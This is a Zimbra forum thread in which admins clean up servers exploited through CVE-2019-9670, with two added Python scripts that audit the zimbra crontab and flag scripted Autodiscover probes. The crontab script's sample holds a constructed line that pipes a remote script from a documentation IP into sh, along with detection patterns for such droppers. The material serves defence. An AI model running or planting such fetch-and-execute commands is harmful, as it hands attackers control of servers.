CVE-2019-9670 being actively exploited (Hacked Server)

phoenix
Ambassador
Posts: 27272
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: CVE-2019-9670 being actively exploited

Post by phoenix »

How about the info in this thread: viewtopic.php?f=15&t=66546
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
Toru
Posts: 7
Joined: Mon Jan 15, 2018 12:44 pm

Re: CVE-2019-9670 being actively exploited

Post by Toru »

Bill, thanks for the answer!

By that time I didn't have the zmcpustater and zmcpustat files on my server.
I had earlier rebuilt the crontab of the zimbra user as described in these instructions: https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
And this file includes only one legitimate line:

Code:

# Run zmgsaupdate util to trickleSync galsync accounts
#
 49 0 * * 7    /opt/zimbra/libexec/zmgsaupdate > /dev/null 2>&1
But all the same, I commented it out (I doubt it was a necessary step :) ).

Memcached I had previously moved to localhost. Now I've made the change and added lines to iptables.

Let's look at the result a little later.
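
Added example, not from this thread or from Zimbra: a small audit of the zimbra user's crontab along the lines of the clean-up described above. It treats entries that run from /opt/zimbra as expected and reports anything that runs from /tmp, /dev/shm or /var/tmp, pipes curl/wget into a shell, or decodes base64 inline. The legitimate zmgsaupdate line is the one quoted in the post; the two other entries in the sample are constructed to illustrate the checks and are not copied from a real infection.

```python
import re

# Constructed sample crontab. Line 3 is the legitimate entry quoted in the thread;
# the last two lines are made-up examples of what a dropper might add (assumption).
SAMPLE_CRONTAB = """\
# Run zmgsaupdate util to trickleSync galsync accounts
#
 49 0 * * 7    /opt/zimbra/libexec/zmgsaupdate > /dev/null 2>&1
*/10 * * * * /tmp/zmcpustat >/dev/null 2>&1
* * * * * curl -fsSL http://198.51.100.7/x.sh | sh
"""

# Schedule is either an @-special (e.g. @reboot) or five fields; the rest is the command.
CRON_RE = re.compile(r"^\s*(@\w+|(?:\S+\s+){4}\S+)\s+(.*)$")

# Assumption: on a stock Zimbra install every zimbra-user cron job runs from /opt/zimbra.
TRUSTED_PREFIXES = ("/opt/zimbra/",)

# Patterns that should never appear in the zimbra crontab.
SUSPICIOUS = (
    re.compile(r"/tmp/|/dev/shm/|/var/tmp/"),
    re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"),
    re.compile(r"base64\s+-d|python\d?\s+-c|chmod\s+\+x"),
)


def classify_entry(command):
    """Return (verdict, reason) for one crontab command string."""
    for pat in SUSPICIOUS:
        if pat.search(command):
            return "suspicious", "matches " + pat.pattern
    tokens = command.split()
    first = tokens[0] if tokens else ""
    if first.startswith(TRUSTED_PREFIXES):
        return "expected", "runs from /opt/zimbra"
    return "review", "runs outside /opt/zimbra"


def audit_crontab(text):
    """Parse crontab text (comments and blanks skipped); return one finding per job."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            findings.append({"line": lineno, "schedule": None, "command": line,
                             "verdict": "review", "reason": "unparsable entry"})
            continue
        schedule, command = m.groups()
        verdict, reason = classify_entry(command)
        findings.append({"line": lineno, "schedule": schedule, "command": command,
                         "verdict": verdict, "reason": reason})
    return findings


if __name__ == "__main__":
    # On a live server: crontab -u zimbra -l | python3 this_script.py (read stdin instead)
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"{f['verdict']:10} line {f['line']}: {f['command']}  ({f['reason']})")
```

The check deliberately errs toward "review" rather than "expected": a crontab entry that points outside /opt/zimbra is not proof of compromise, but on a box where zmcpustat keeps reappearing it is the first thing to read line by line.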
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: CVE-2019-9670 being actively exploited

Post by mqaroush »

How can I prevent Autodiscover?

Code:

[root@xxx tmp]# cat /opt/zimbra/log/access_log.2019-07-09 | grep pyth
113.196.70.24 -  -  [10/Jul/2019:02:29:55 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 85
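
Added example, not from this thread or from Zimbra: the grep above finds one scripted client hitting the Autodiscover servlet, which is the endpoint the CVE-2019-9670 XXE lives in. The script below parses lines in the access_log format shown in the post, groups POSTs to /Autodiscover/Autodiscover.xml per source IP, and flags sources using a scripted User-Agent (python-requests, curl and the like). The first sample line is the one quoted above; the others are constructed in the same format using documentation IP ranges. The User-Agent list is an assumption and is trivially spoofable, which is why the per-IP summary is kept independent of it.

```python
import re
from collections import defaultdict

# Constructed sample log. The first line is the one quoted in the post above;
# the remaining lines are made up in the same format (documentation IPs).
SAMPLE_LOG = """\
113.196.70.24 -  -  [10/Jul/2019:02:29:55 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 85
113.196.70.24 -  -  [10/Jul/2019:02:29:57 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 81
203.0.113.5 -  -  [10/Jul/2019:08:12:03 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 200 1311 "-" "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4266; Pro)" 120
198.51.100.9 -  -  [10/Jul/2019:08:13:44 +0000] "GET /zimbra/ HTTP/1.1" 200 2214 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/68.0" 14
192.0.2.77 -  -  [10/Jul/2019:09:01:10 +0000] "POST /autodiscover/autodiscover.xml HTTP/1.1" 500 0 "-" "curl/7.64.0" 33
"""

# ip ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent" [duration]
LOG_RE = re.compile(
    r'^(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+)\s+(?P<path>\S+)[^"]*"\s+'
    r'(?P<status>\d{3})\s+(?P<bytes>\S+)\s+"(?P<referer>[^"]*)"\s+"(?P<ua>[^"]*)"'
)

# Assumption: these substrings mark scripted clients. The UA is attacker-controlled,
# so treat a hit as a strong signal and a miss as no information.
SCRIPTED_UA = re.compile(r"python-requests|curl/|wget/|go-http-client|libwww", re.I)

AUTODISCOVER = "/autodiscover/autodiscover.xml"


def parse_line(line):
    """Return a dict of fields for one access_log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_autodiscover_post(rec):
    # Zimbra serves the servlet under both capitalisations; compare case-insensitively.
    return rec["method"] == "POST" and rec["path"].lower().startswith(AUTODISCOVER)


def is_scripted_probe(rec):
    """True for an Autodiscover POST from a scripted client."""
    return is_autodiscover_post(rec) and bool(SCRIPTED_UA.search(rec["ua"]))


def summarize(text):
    """Per source IP: Autodiscover POST count, scripted count, statuses and UAs seen."""
    per_ip = defaultdict(lambda: {"posts": 0, "scripted": 0, "statuses": set(), "uas": set()})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_autodiscover_post(rec):
            continue
        s = per_ip[rec["ip"]]
        s["posts"] += 1
        s["scripted"] += int(is_scripted_probe(rec))
        s["statuses"].add(int(rec["status"]))
        s["uas"].add(rec["ua"])
    return dict(per_ip)


def flagged_ips(text):
    """Sorted list of source IPs with at least one scripted Autodiscover POST."""
    return sorted(ip for ip, s in summarize(text).items() if s["scripted"])


if __name__ == "__main__":
    # On a live server read /opt/zimbra/log/access_log.* instead of SAMPLE_LOG.
    for ip, s in summarize(SAMPLE_LOG).items():
        tag = "FLAG" if s["scripted"] else "ok  "
        print(f"{tag} {ip}: {s['posts']} posts, statuses {sorted(s['statuses'])}, UAs {sorted(s['uas'])}")
```

Two caveats when reading the output: the status code alone does not tell you whether a request did anything, so a run of 400s from one IP is still worth tracing through mailbox.log for the same timestamps, and the Outlook-style entry is what legitimate Autodiscover traffic looks like, which is the reason for not simply blocking the endpoint.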

phoenix
Ambassador
Posts: 27272
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: CVE-2019-9670 being actively exploited

Post by phoenix »

mqaroush wrote: How can I prevent Autodiscover?
Why, do you think it's a problem or is it causing you a problem?
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
RomanI
Posts: 15
Joined: Mon Jul 08, 2019 6:27 pm

Re: CVE-2019-9670 being actively exploited

Post by RomanI »

I've been actively fighting an infection on an 8.6, patch 14 install. I have followed the steps outlined and keep having this thing coming back.

Yesterday we had zmcpustat appear again. I stopped the process, cleaned it, deleted the file, created a temp file with the same name, locked it using chattr, cleaned the crontab, and today I've got zmiostat using up 1200% of the CPU...

We are migrating everything over to a new box (time consuming as we've got 300+ mailboxes and 3 TB of data) running 8.8, but in the meantime they still seem to be getting in on the old server...
rodrigoferra
Posts: 18
Joined: Thu Jul 11, 2019 11:11 am

Re: CVE-2019-9670 being actively exploited

Post by rodrigoferra »

Two days ago I was attacked by this bitcoin stuff.

I did every step necessary, patched the software, followed a lot of instructions... Currently my zmopendkimctl is not running, and zmconfigd always seems to fail on start but later it's working.

It's the first time I'm facing something like this.

Best regards!
RomanI
Posts: 15
Joined: Mon Jul 08, 2019 6:27 pm

Re: CVE-2019-9670 being actively exploited

Post by RomanI »

So the last attempt (yesterday) put a fake zmiostat into /tmp...

Again I cleaned that, created a dummy file with the same name and then used chattr to lock it...

Reset all Zimbra passwords...

So far it's been clean through the night, but then we were also clear for close to a month after doing patch 14 and it then returned...

The best bet as far as I can tell is still to build a new server and migrate everything over...

Does anyone out there have a way to migrate contact data (address, phone etc.)? All the built-in tools that I've seen don't allow access to that, and I'm hesitant to start playing with the LDAP directly....
phoenix
Ambassador
Posts: 27272
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: CVE-2019-9670 being actively exploited

Post by phoenix »

You can move all your current data and config to a new server with the ZeXtras Migration Tool, take a look at that.
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
RomanI
Posts: 15
Joined: Mon Jul 08, 2019 6:27 pm

Re: CVE-2019-9670 being actively exploited

Post by RomanI »

"You can move all your current data and config to a new server with the ZeXtras Migration Tool, take a look at that."

The problem with that approach is that we've got way too much data and too many mailboxes to get it done quickly enough. We are a 24/7 shop and any email downtime affects the bottom line...

The approach we ended up taking (since we were also migrating versions and core OS) was to set up the new server, extract mailbox info, signatures etc., import them back onto the new server, bring it online, and now, with the old server offline (but accessible so that staff can view old emails/contacts until their mailbox is queued to be imported), we are exporting mailbox data and importing it back in batches...

All the scripts/tools that I've been using have worked very well, with the exception of the contact info, for which, for some reason I can't fathom, there are no CLI tools to permit anyone to access, export or import....
rodrigoferra
Posts: 18
Joined: Thu Jul 11, 2019 11:11 am

Re: CVE-2019-9670 being actively exploited

Post by rodrigoferra »

My current situation is that everything seems to be back to normal.

- Applied patch 14;
- Searched for the files, found one file called Docs.js with some injection code in it, cleaned it;
- A problem with DKIM and IPv6 after the patch;
- Renewed all the keys and passwords.

The opendkim issue I solved with this link: https://sebastian.marsching.com/blog/ar ... erver.html

I installed fail2ban too, as there were too many tries at my Postfix via SASL, and renewed the Zimbra keys. My server is extremely closed now.